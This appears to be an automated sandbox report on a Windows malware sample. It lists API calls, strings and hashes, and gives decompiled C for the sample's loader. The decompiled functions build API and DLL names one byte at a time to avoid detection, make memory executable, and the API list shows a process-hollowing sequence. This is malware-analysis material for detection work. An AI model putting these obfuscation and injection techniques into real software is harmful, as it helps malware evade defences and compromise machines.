GetPrivateProfileStructA.KERNEL32 ref: 00405571
EnterCriticalSection.KERNEL32(?), ref: 0040557B
InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 00405580
EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040558A
LocalUnlock.KERNEL32(00000000), ref: 00405591
CancelDeviceWakeupRequest.KERNEL32(00000000), ref: 00405598
GetComputerNameW.KERNEL32 ref: 004055A9
EnterCriticalSection.KERNEL32(?), ref: 004055B3
GetModuleHandleA.KERNEL32(00000000), ref: 004055D0
GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004055DC
GetProcAddress.KERNEL32(VirtualProtect), ref: 004055FC
InterlockedIncrement.KERNEL32(?), ref: 00405641
GetCharWidthA.GDI32(00000000,00000000,00000000,00000000), ref: 0040564B
SetThreadToken.ADVAPI32(00000000,00000000), ref: 00405677
FindNextVolumeA.KERNEL32(00000000,00000000,00000000), ref: 0040569A
GetModuleHandleA.KERNEL32(Lef tibiwuhafibir), ref: 004056A5
CreateActCtxW.KERNEL32(?), ref: 004056AB
VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 004056BB
InterlockedDecrement.KERNEL32(00000000), ref: 004056C2
InterlockedIncrement.KERNEL32(00000000), ref: 004056C9
MoveFileWithProgressA.KERNEL32 ref: 004056D4
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004056EC
GlobalFindAtomW.KERNEL32(jijozumadik), ref: 004056F7
LoadLibraryW.KERNEL32(00000000), ref: 004056FE
MoveFileWithProgressA.KERNEL32 ref: 00405709
SetProcessAffinityMask.KERNEL32(00000000,00000000), ref: 0040570D
GetACP.KERNEL32 ref: 00405713
DefineDosDeviceW.KERNEL32(00000000,00000000,00000000), ref: 0040571C
GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,?), ref: 0040572F
InterlockedExchange.KERNEL32(?,00000000), ref: 0040573A
GetPrivateProfileStructW.KERNEL32 ref: 0040574B
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405756
_lread.KERNEL32(00000000,00000000,00000000), ref: 0040575F
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 0040576F
GetPrivateProfileIntA.KERNEL32 ref: 00405779
OpenJobObjectW.KERNEL32 ref: 00405786
GetTapeParameters.KERNEL32 ref: 00405793
GetMailslotInfo.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040579E
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 004057A7
GetSystemWindowsDirectoryA.KERNEL32 ref: 004057B5
OpenFileMappingA.KERNEL32 ref: 004057BE
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004057C5
SetFileTime.KERNEL32(00000000,?,?,?), ref: 004057D8

Strings

VirtualProtect, xrefs: 004055C1, 004055DB, 004055EF, 004055F6
Lef tibiwuhafibir, xrefs: 004056A0
Lipafi goleheriziv, xrefs: 0040577F
jijozumadik, xrefs: 004056F2
Cixofarifozehuv rilivavihe rofa juyunevame, xrefs: 004054CC

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: FileInterlocked$ConsoleHandleInfo$ExchangeIncrementModulePrivateProfile$CalendarCriticalDeviceEnterEnumFindLengthLibraryLoadMoveOpenProgressSectionStructWith$AddressAffinityAliasAliasesApisAtomCancelCharCompareComputerCopyCountCreateDecrementDefineDirectoryDiskErrorExesFreeGlobalInputLastLocalLockMailslotMappingMaskNameNamedNextObjectParametersPipeProcProcessReadRequestSpaceStateSystemTapeThreadTickTimeTokenUnlockVerifyVersionVolumeWakeupWidthWindowsWrite_lread
String ID: Cixofarifozehuv rilivavihe rofa juyunevame$Lef tibiwuhafibir$Lipafi goleheriziv$VirtualProtect$jijozumadik
API String ID: 1457462388-3514249173
Opcode ID: 2b5aae3e83c8315b457200b043a2e3f9ceb9a4104daecfdbefeb14b609271f16
Instruction ID: 08019152a2c2f253fc8e3e2ec4ae27ce5eadfc123fbb47b72d69aa9636cf313a
Opcode Fuzzy Hash: 2b5aae3e83c8315b457200b043a2e3f9ceb9a4104daecfdbefeb14b609271f16
Instruction Fuzzy Hash: 89911BB2800558BFDB11ABA0EE88DEF777CEB18345B405436F646F2461DA389D849F78

Uniqueness

Uniqueness Score: -1.00%

Function 021B0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021B0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021B016C
CreateProcessA.KERNELBASE(?,00000000), ref: 021B0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021B0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021B0283
GetThreadContext.KERNELBASE(00000000,?), ref: 021B029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021B02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021B02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021B0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021B032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021B0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021B03BF
SetThreadContext.KERNELBASE(00000000,?), ref: 021B03E1
ResumeThread.KERNELBASE(00000000), ref: 021B03ED
ExitProcess.KERNEL32(00000000), ref: 021B0412

Memory Dump Source

Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 81fe16addc6e27c39443063ed43a1d853767ada4b3a18cf17f909fab6d8313ea
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 07B1B574A00208AFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 021B0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021B0533

Strings

saodkfnosa9uin, xrefs: 021B04DA
0, xrefs: 021B0492
mfoaskdfnoa, xrefs: 021B0520, 021B0523
d, xrefs: 021B0584

Memory Dump Source

Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 5ffb71b6f1df3e0508b6f68498e6426d50df0c53609cf72b2818bd8d06812f48
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: EA512B70D48388DEEB11CBD8C849BDEBFB66F15708F144058D5447F286C3BA5658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004057E9 Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004057E9() {
				char _v28;
				char _v164;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				intOrPtr _t6;
				void* _t23;
				void* _t28;
				void* _t29;
				void* _t30;

				_t30 = 0;
				_t34 =  *0x588f80 - 3;
				if( *0x588f80 == 3) {
					E00409328(0, 0, 0);
					_push(0);
					_push(0);
					_push(0);
					E004091E5(_t23, _t28, _t29, 0, _t34);
					E004091B5(0);
					_push(0);
					_push(0);
					E004090A9(_t23, _t28, _t29, 0, _t34);
					E00409076(0, 0);
					E004074F1( &_v28, _t34);
					_push(1);
					_push(3);
					E004076B8( &_v164);
					E00408F5F(_t23, _t28, _t29, 0);
					E00408F48(_t34, 0);
					_push(0);
					E00408E16();
					_push(0);
					E004089EA(_t23, _t29, 0, _t34);
					_push(0);
					_push(0);
					E00408BE5(_t23, _t29, 0, _t34);
					E00406B71( &_v164);
					_t24 =  &_v28;
					E00407633( &_v28, 0, _t34);
				}
				_t5 =  *0x420dd4; // 0xba8a
				 *0x588f80 = _t5;
				do {
					if(_t30 == 0x1737) {
						_t6 =  *0x420008; // 0x41d50a
						 *0x588f84 = _t6;
					}
					_t30 = _t30 + 1;
				} while (_t30 < 0x79a863);
				E00405467(_t24); // executed
				return 0;
			}

0x004057f3
0x004057f5
0x004057fc
0x00405801
0x00405806
0x00405807
0x00405808
0x00405809
0x0040580f
0x00405814
0x00405815
0x00405816
0x0040581d
0x00405828
0x0040582d
0x0040582f
0x00405837
0x0040583c
0x00405842
0x00405847
0x00405848
0x0040584d
0x0040584e
0x00405853
0x00405854
0x00405855
0x00405863
0x00405868
0x0040586b
0x0040586b
0x00405870
0x00405875
0x0040587a
0x00405880
0x00405882
0x00405887
0x00405887
0x0040588c
0x0040588d
0x00405895
0x0040589e

APIs

__vswprintf.LIBCMT ref: 00405801

Part of subcall function 00409328: __vsprintf_l.LIBCMT ref: 00409338

_printf.LIBCMT ref: 00405809

Part of subcall function 004091B5: DeleteFileA.KERNEL32(00000000,?,00405814,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091BD
Part of subcall function 004091B5: GetLastError.KERNEL32(?,00405814,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091C7
Part of subcall function 004091B5: __dosmaperr.LIBCMT ref: 004091D6

_fputc.LIBCMT ref: 00405816

Part of subcall function 00409076: MoveFileA.KERNEL32 ref: 00409081
Part of subcall function 00409076: GetLastError.KERNEL32(?,00405822,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040908B
Part of subcall function 00409076: __dosmaperr.LIBCMT ref: 0040909A

Part of subcall function 004074F1: __EH_prolog.LIBCMT ref: 004074F6

Part of subcall function 004076B8: __EH_prolog.LIBCMT ref: 004076BD

_abort.LIBCMT ref: 0040583C

Part of subcall function 00408F5F: __NMSG_WRITE.LIBCMT ref: 00408F80
Part of subcall function 00408F5F: _raise.LIBCMT ref: 00408F91
Part of subcall function 00408F5F: _memset.LIBCMT ref: 00409029
Part of subcall function 00408F5F: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0040905B
Part of subcall function 00408F5F: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00409068

Part of subcall function 004089EA: __lock.LIBCMT ref: 00408A08
Part of subcall function 004089EA: ___sbh_find_block.LIBCMT ref: 00408A13
Part of subcall function 004089EA: ___sbh_free_block.LIBCMT ref: 00408A22
Part of subcall function 004089EA: HeapFree.KERNEL32(00000000,?,0041E230,0000000C,0040E420,00000000,0041E560,0000000C,0040E45A,?,?,?,00412359,00000004,0041E640,0000000C), ref: 00408A52
Part of subcall function 004089EA: GetLastError.KERNEL32(?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001,00000214), ref: 00408A63

_realloc.LIBCMT ref: 00405855

Part of subcall function 00408BE5: _malloc.LIBCMT ref: 00408BFB

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ErrorLast$ExceptionFileFilterH_prologUnhandled__dosmaperr$DeleteFreeHeapMove___sbh_find_block___sbh_free_block__lock__vsprintf_l__vswprintf_abort_fputc_malloc_memset_printf_raise_realloc
String ID:
API String ID: 3215118070-0
Opcode ID: a6ace16ddf9c902af84ec2c54a869bd85f3f4a02d5f5cf95cd6e241be85c6084
Instruction ID: a1f2a4fb0a9e460dc3af8596b9f07d2cbfde25b125f958ccfb3a22daf894e4ec
Opcode Fuzzy Hash: a6ace16ddf9c902af84ec2c54a869bd85f3f4a02d5f5cf95cd6e241be85c6084
Instruction Fuzzy Hash: 15015E3190293466C625B7378C47EDF7A68DF12358F80003EF849721D29E3C1A468AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00405353 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405353(void* __eax, void* __ecx) {
				long _v8;
				struct HINSTANCE__* _t4;
				int _t6;
				CHAR* _t10;

				_t10 = "VirtualProtect";
				"lProtect" = 0x33;
				"Protect" = 0x32;
				 *0x431ad3 = 0x6c;
				M00431ACB = 0x6e;
				"VirtualProtect" = 0x6b;
				M00431ACC = 0x65;
				M00431ACD = 0x6c;
				M00431AC9 = 0x65;
				M00431ACA = 0x72;
				"rotect" = 0x2e;
				 *0x431ad1 = 0x64;
				 *0x431ad2 = 0x6c;
				 *0x431ad4 = 0;
				_t4 = GetModuleHandleA(_t10);
				 *0x5873fc = _t4;
				 *0x431ad3 = 0x65;
				M00431AC9 = 0x69;
				M00431ACC = 0x75;
				"lProtect" = 0x6c;
				M00431ACD = 0x61;
				 *0x431ad1 = 0x6f;
				 *0x431ad5 = 0x74;
				"VirtualProtect" = 0x56;
				 *0x431ad4 = 0x63;
				"Protect" = 0x50;
				 *0x431ad6 = 0;
				M00431ACB = 0x74;
				 *0x431ad2 = 0x74;
				M00431ACA = 0x72;
				"rotect" = 0x72;
				 *0x431ac4 = GetProcAddress(_t4, _t10);
				_t6 = VirtualProtect( *0x5838fc,  *0x588f80, 0x40,  &_v8); // executed
				return _t6;
			}

0x0040535a
0x00405360
0x00405367
0x0040536e
0x00405375
0x0040537c
0x00405383
0x0040538a
0x00405391
0x00405398
0x0040539f
0x004053a6
0x004053ad
0x004053b4
0x004053bb
0x004053c3
0x004053c8
0x004053cf
0x004053d6
0x004053dd
0x004053e4
0x004053eb
0x004053f2
0x004053f9
0x00405400
0x00405407
0x0040540e
0x00405415
0x0040541c
0x00405423
0x0040542a
0x00405443
0x0040544e
0x00405452

APIs

GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004053BB
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00405431
VirtualProtect.KERNELBASE(00000040,?), ref: 0040544E

Strings

VirtualProtect, xrefs: 0040535A, 0040535F, 004053C1

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: VirtualProtect
API String ID: 2099061454-268857135
Opcode ID: 03a2b06d3c5407b6fa9ae1ba496f00dc7ad6cd7f5605da8864e3c21e7c9833ad
Instruction ID: 77afcab1837504b6b7a9f7825e90ade39315f7ed8bb655931f8ce39dea576d4f
Opcode Fuzzy Hash: 03a2b06d3c5407b6fa9ae1ba496f00dc7ad6cd7f5605da8864e3c21e7c9833ad
Instruction Fuzzy Hash: 0B21C62040E6C0DDE302E729AC187513FD6A76274AF0C20A9D184DAAF2D3FB1168C77E

Uniqueness

Uniqueness Score: -1.00%

Function 00405355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405355(void* __ecx) {
				long _v8;
				struct HINSTANCE__* _t2;
				int _t4;
				CHAR* _t8;

				_t8 = "VirtualProtect";
				"lProtect" = 0x33;
				"Protect" = 0x32;
				 *0x431ad3 = 0x6c;
				M00431ACB = 0x6e;
				"VirtualProtect" = 0x6b;
				M00431ACC = 0x65;
				M00431ACD = 0x6c;
				M00431AC9 = 0x65;
				M00431ACA = 0x72;
				"rotect" = 0x2e;
				 *0x431ad1 = 0x64;
				 *0x431ad2 = 0x6c;
				 *0x431ad4 = 0;
				_t2 = GetModuleHandleA(_t8);
				 *0x5873fc = _t2;
				 *0x431ad3 = 0x65;
				M00431AC9 = 0x69;
				M00431ACC = 0x75;
				"lProtect" = 0x6c;
				M00431ACD = 0x61;
				 *0x431ad1 = 0x6f;
				 *0x431ad5 = 0x74;
				"VirtualProtect" = 0x56;
				 *0x431ad4 = 0x63;
				"Protect" = 0x50;
				 *0x431ad6 = 0;
				M00431ACB = 0x74;
				 *0x431ad2 = 0x74;
				M00431ACA = 0x72;
				"rotect" = 0x72;
				 *0x431ac4 = GetProcAddress(_t2, _t8);
				_t4 = VirtualProtect( *0x5838fc,  *0x588f80, 0x40,  &_v8); // executed
				return _t4;
			}

APIs

GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004053BB
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00405431
VirtualProtect.KERNELBASE(00000040,?), ref: 0040544E

Strings

VirtualProtect, xrefs: 0040535A, 0040535F, 004053C1

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: VirtualProtect
API String ID: 2099061454-268857135
Opcode ID: d0d815820f698ffe7fcbcdce8aed8f89374a43fe3a38154b444991f99cca84fd
Instruction ID: d351fd4be09a0e36ebd033f31072c1fa880a8a4c200c79683c9707f30f8d9d36
Opcode Fuzzy Hash: d0d815820f698ffe7fcbcdce8aed8f89374a43fe3a38154b444991f99cca84fd
Instruction Fuzzy Hash: 9121C61040E6C0DDE302E729AC187513ED6A76274AF0C20A9D184DAAF2D3FB1168C77E

Uniqueness

Uniqueness Score: -1.00%

Function 021B05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 021B05EC

Strings

o, xrefs: 021B0600
apfHQ, xrefs: 021B05E2, 021B05E5

Memory Dump Source

Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: ae06fc259df5a8143a9be403b7415ab1dc3c8ba716a2aecac0af8d26ab44ac0e
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: E0011A70C0425CEEDB15DBA8C5187EEBFB5AF45308F148099C4192B242D7B69B99CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004112DF Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004112DF() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E0040A295(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00409F30(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x004112e2
0x004112e8
0x004112ee
0x004112f7
0x00000000
0x004112f9
0x004112f9
0x004112f9
0x004112fa
0x004112fb
0x00411301
0x00411302
0x004112f9
0x0041130c
0x00411310
0x00411315
0x0041131a
0x0041132c
0x00411331
0x0041131d
0x00411328
0x004112f0
0x004112f3
0x004112f3

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00409432), ref: 004112E2
__malloc_crt.LIBCMT ref: 00411310
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041131D

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: a88408b8304d12008ab2b2978674a95c1f1d56b5c3dde02752526f287eeb7ebf
Instruction ID: 12b9bbb320df55b64a6d4fb98f6373968a5016189888f39b05d51ecead3a8373
Opcode Fuzzy Hash: a88408b8304d12008ab2b2978674a95c1f1d56b5c3dde02752526f287eeb7ebf
Instruction Fuzzy Hash: 39F0E23A6001215EEA2177347C448F7162CDA8A329315447BFAA2D3260FA384CC282A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404F21 Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404F21() {
				short _t1;
				short _t2;
				short _t3;
				short _t5;
				short _t6;
				short _t7;
				short _t8;
				short _t9;
				short _t10;
				short _t11;
				short _t12;
				struct HINSTANCE__* _t13;

				_t1 = 0x6d;
				 *0x587400 = _t1;
				_t2 = 0x73;
				 *0x587402 = _t2;
				_t3 = 0x33;
				 *0x58740a = _t3;
				 *0x587416 = 0;
				_t5 = 0x67;
				 *0x587408 = _t5;
				_t6 = 0x64;
				 *0x587410 = _t6;
				_t7 = 0x6d;
				 *0x587406 = _t7;
				_t8 = 0x6c;
				 *0x587412 = _t8;
				_t9 = 0x2e;
				 *0x58740e = _t9;
				_t10 = 0x6c;
				 *0x587414 = _t10;
				_t11 = 0x32;
				 *0x58740c = _t11;
				_t12 = 0x69;
				 *0x587404 = _t12; // executed
				_t13 = LoadLibraryW(0x587400); // executed
				return _t13;
			}

0x00404f23
0x00404f26
0x00404f2c
0x00404f2f
0x00404f35
0x00404f38
0x00404f40
0x00404f46
0x00404f49
0x00404f4f
0x00404f52
0x00404f58
0x00404f5b
0x00404f61
0x00404f64
0x00404f6a
0x00404f6d
0x00404f73
0x00404f76
0x00404f7c
0x00404f7f
0x00404f85
0x00404f8b
0x00404f91
0x00404f97

APIs

LoadLibraryW.KERNELBASE(00587400,00405685), ref: 00404F91

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e987b3369ab0c6f6085b7f1d849a831fed47046a39b8d015d54a4b17f4470c92
Instruction ID: aa7a00a8e72513e4ada6ba9fe453f7306847f8bab2a8f60b11f4a8ec55921c34
Opcode Fuzzy Hash: e987b3369ab0c6f6085b7f1d849a831fed47046a39b8d015d54a4b17f4470c92
Instruction Fuzzy Hash: BAF0463565C384D4F94197E07D12B312F25EF58B14F30B817DE10DF1F1E2A28599A76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E293 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E293(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x589108 = _t6;
				if(_t6 != 0) {
					 *0x58add4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040e2a8
0x0040e2ae
0x0040e2b5
0x0040e2bc
0x0040e2c2
0x0040e2b8
0x0040e2b8
0x0040e2b8

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E2A8

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ffa02f77b6bb53ec4e1ef010e9bc7ec29d647c434355e41a0e65af76aab84b56
Instruction ID: e98fc74eb4793bb7cc445aec71ec37972efa20053ed3a8de3df731bee56d6e2a
Opcode Fuzzy Hash: ffa02f77b6bb53ec4e1ef010e9bc7ec29d647c434355e41a0e65af76aab84b56
Instruction Fuzzy Hash: AFD05E725543456EEB005F71BC087723BDC9394395F148476BE0CD6290F575C590E704

